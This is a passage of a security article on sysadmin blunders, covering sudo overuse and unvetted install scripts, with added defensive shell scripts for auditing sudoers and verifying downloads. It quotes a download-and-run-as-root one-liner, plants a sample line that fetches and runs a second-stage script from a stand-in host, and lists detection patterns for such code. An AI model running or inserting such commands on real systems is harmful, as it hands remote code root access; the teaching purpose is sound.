10 dumb security mistakes sys admins make

Fahmida Y. Rashid

Security isn’t merely a technical problem -- it's a people problem. There’s only so much technology you can throw at a network before dumb human mistakes trip you up.

But guess what? Those mistakes are often committed by the very people who should know better: system administrators and other IT staff.

Intermedia's 2015 Insider Risk Report found that IT professionals were the most likely group to engage in “dangerous” security practices, such as sharing passwords/logins, reusing personal passwords for business applications, or giving personal account credentials to others. 

Such lapses tend to be far riskier than those of ordinary users, due to the godlike powers sys admins have over the network. IT pros can be as susceptible as users to phishing, malware, and other attacks -- and stolen, privileged sys admin credentials almost always result in far more serious security breaches.

Here are 10 common security blunders made by sys admins and other IT staff:

Blunder No. 1: Using sudo for everything

When you log in as root, you have full control over the box. This can be extremely dangerous because if your credentials get stolen, an attacker can do whatever he or she wants.

In Windows parlance, there’s no need to log in as Administrator if there are no administrator-level tasks to perform. Instead of directly logging into systems as root, log in through your personal account and use sudo for specific commands as needed.

It's easy to backslide if you're not careful. A script fails because one of the commands needed sudo -- and now everything must be restarted. If you fail to keep track of which commands require elevated privileges and which don’t, you may go back to running everything as sudo.
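The "use sudo for specific commands" advice only helps if the sudoers rules are actually narrow: a drop-in that grants `ALL` is root login with an extra step. The following is an added example, not from the article, that audits sudoers drop-in files for such blanket grants and shows the weak rule beside a least-privilege one. The user `alice`, the `ops` group and the nginx command paths are constructed assumptions.

```sh
#!/bin/sh
# Added example (not from the article): audit sudoers drop-ins for blanket grants.

# Constructed weak rule: alice can run any command as any user, without a
# password. Functionally this is "log in as root" with one more keystroke.
WEAK_RULE='alice ALL=(ALL) NOPASSWD: ALL'

# Constructed least-privilege rules: the ops group may run only the commands
# its job needs, as root, and nothing else. Group and paths are assumptions.
TIGHT_RULES='%ops ALL=(root) /usr/bin/systemctl restart nginx, /usr/bin/systemctl status nginx
%ops ALL=(root) /usr/bin/journalctl -u nginx'

# blanket_grants FILE: print every non-comment line (root's own entry excluded)
# whose command list is the bare keyword ALL, with or without tags such as
# NOPASSWD:. Exits 0 even when nothing is found so it composes under set -e.
blanket_grants() {
    grep -v '^[[:space:]]*root[[:space:]]' "$1" \
      | grep -E '^[^#]*=[[:space:]]*(\([^)]*\)[[:space:]]*)?([A-Z]+:[[:space:]]*)*ALL[[:space:]]*$' \
      || true
}

# audit_sudoers FILE: 0 when no blanket grant is present, 1 otherwise, with
# the offending lines reported on stderr.
audit_sudoers() {
    found=$(blanket_grants "$1")
    if [ -n "$found" ]; then
        printf 'blanket grant in %s:\n%s\n' "$1" "$found" >&2
        return 1
    fi
    return 0
}

# Constructed sample files standing in for entries under /etc/sudoers.d/.
SUDOERS_DIR=$(mktemp -d)
printf '%s\n' "$WEAK_RULE" > "$SUDOERS_DIR/weak"
printf '%s\n' "$TIGHT_RULES" > "$SUDOERS_DIR/tight"

# Real use: for f in /etc/sudoers.d/*; do audit_sudoers "$f"; done
```

The regular expression is a heuristic for the audit, not a sudoers parser; pair it with `visudo -c -f FILE`, which checks a fragment's syntax before it is installed, and remember that a narrow rule still needs care about which binaries it names (anything that spawns a shell or accepts arbitrary arguments is effectively `ALL`).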

Blunder No. 2: Running scripts of unknown origin

Installing third-party Linux applications is another area where sudo can be abused. All you have to do is copy and paste the command -- which is already set up to use sudo -- directly into the terminal to kick off the install script. Every single command in that script will be executed with elevated privileges.

Here's an example, copied right off the Web (with the URL hidden):

sudo -v && wget -nv -O- https://xxx/xxx/linux-installer.py | sudo python -c "import sys; main=lambda:sys.stderr.write('Download failed\n'); exec(sys.stdin.read()); main()"

This hands root privileges to whatever the remote server happens to return, executed on the spot by the local Python interpreter with no chance to read it first (the leading sudo -v refreshes the cached sudo credential, so the second sudo never even prompts). Not recommended! Windows admins face similar potential catastrophes running downloaded PowerShell scripts.

Even if you trust the source, never assume a script downloaded from the Internet is safe. Always vet the contents of the script first and verify that executing the commands will not result in nefarious actions.
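The safer pattern is to break the one-liner into separate, deliberate steps: download to disk, verify the file against a digest the vendor published through a different channel, read it (with a quick scan to focus the review), and only then run it, as yourself rather than as root. The script below is an added example, not from the article; the installer content, the digest and the tampered copy are constructed locally so it runs offline, and `python3` is assumed to be the interpreter the script needs.

```sh
#!/bin/sh
# Added example (not from the article): replace "wget -O- URL | sudo python"
# with download -> verify -> review -> run as separate steps.

# sha256 of a file; works with GNU sha256sum or BSD/macOS shasum.
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_download FILE EXPECTED_SHA256: 0 only when the digest matches.
verify_download() {
    [ "$(file_sha256 "$1")" = "$2" ]
}

# red_flags FILE: print, with line numbers, lines that call out to a shell,
# decode embedded payloads or evaluate generated code. A heuristic to focus
# the manual read-through, not a substitute for it.
red_flags() {
    grep -nE 'os\.system|subprocess|\|[[:space:]]*(ba)?sh([^a-z]|$)|base64|eval\(' "$1" || true
}

# vet_script FILE EXPECTED_SHA256: refuse on digest mismatch, otherwise show
# the flagged lines and succeed. Nothing is executed here.
vet_script() {
    if ! verify_download "$1" "$2"; then
        echo "digest mismatch for $1: not the published release, refusing" >&2
        return 1
    fi
    flags=$(red_flags "$1")
    if [ -n "$flags" ]; then
        printf 'review these lines in %s before running:\n%s\n' "$1" "$flags"
    fi
    return 0
}

# run_vetted FILE EXPECTED_SHA256: run the on-disk copy only after vet_script
# passes, as the current user. Elevate individual commands later if they need it.
run_vetted() {
    vet_script "$1" "$2" >/dev/null || return 1
    python3 "$1"
}

# Constructed stand-in for the downloaded linux-installer.py. In real use:
#   tmp=$(mktemp) && wget -nv -O "$tmp" "$URL"
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/linux-installer.py" <<'EOF'
import os
# constructed sample: only prints; a real installer does far more
print("hello from installer")
EOF

# The digest a vendor would publish on its release page; computed here from
# the known-good copy to simulate that out-of-band channel.
KNOWN_GOOD_SHA256=$(file_sha256 "$SAMPLE_DIR/linux-installer.py")

# A tampered copy: the same file with one appended line that would pull and
# run an unseen second stage. Its digest no longer matches, and red_flags
# highlights the line for the reviewer.
cp "$SAMPLE_DIR/linux-installer.py" "$SAMPLE_DIR/tampered.py"
printf '%s\n' 'os.system("wget -O- http://example.invalid/stage2.sh | sh")' >> "$SAMPLE_DIR/tampered.py"
```

The digest check is only as good as the channel the expected value came from: a checksum sitting next to the download on the same server proves nothing if that server is the thing you distrust, so prefer a signature or a digest obtained from a separate source. The pattern scan catches the obvious, not the subtle; the read-through the article calls for is still the real control.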
